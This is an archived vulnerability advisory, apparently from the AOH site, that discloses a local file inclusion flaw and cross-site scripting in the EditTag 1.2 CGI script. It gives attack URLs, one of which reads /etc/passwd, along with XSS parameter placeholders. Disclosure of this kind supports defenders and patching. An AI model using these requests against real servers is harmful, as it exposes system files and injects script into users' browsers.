AOH :: HP Unsorted E :: C07-1679.HTM

EditTag multi vulns



Multiple bugs in EditTag
Multiple bugs in EditTag



Script: EditTag
Version: 1.2
Author: Greg Billock (dmacewen@isn.net) 
Discoverer: NetJackal (nima_501[4T]yAhoo[D0T]com - nj[4T]hackerz[D0T]ir)

I am sorry for my BAD English.

Description:

1) Local file injection:
An attacker can use edittag.cgi or edittag_mp.cgi (maybe .pl) to inject files (ex. /etc/passwd)

http://www.victim/edittag/edittag.cgi?file=INJECT 
http://www.victim/edittag/edittag.pl?file=INJECT 
http://www.victim/edittag/edittag_mp.cgi?file=INJECT 
http://www.victim/edittag/edittag_mp.pl?file=INJECT 

ex. http://www.victim/edittag/edittag_mp.pl?file=/etc/passwd 

2)XSS

http://www.victim/edittag/mkpw_mp.cgi?plain=XSS 
http://www.victim/edittag/mkpw.pl?plain=XSS 
http://www.victim/edittag/mkpw.cgi?plain=XSS 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.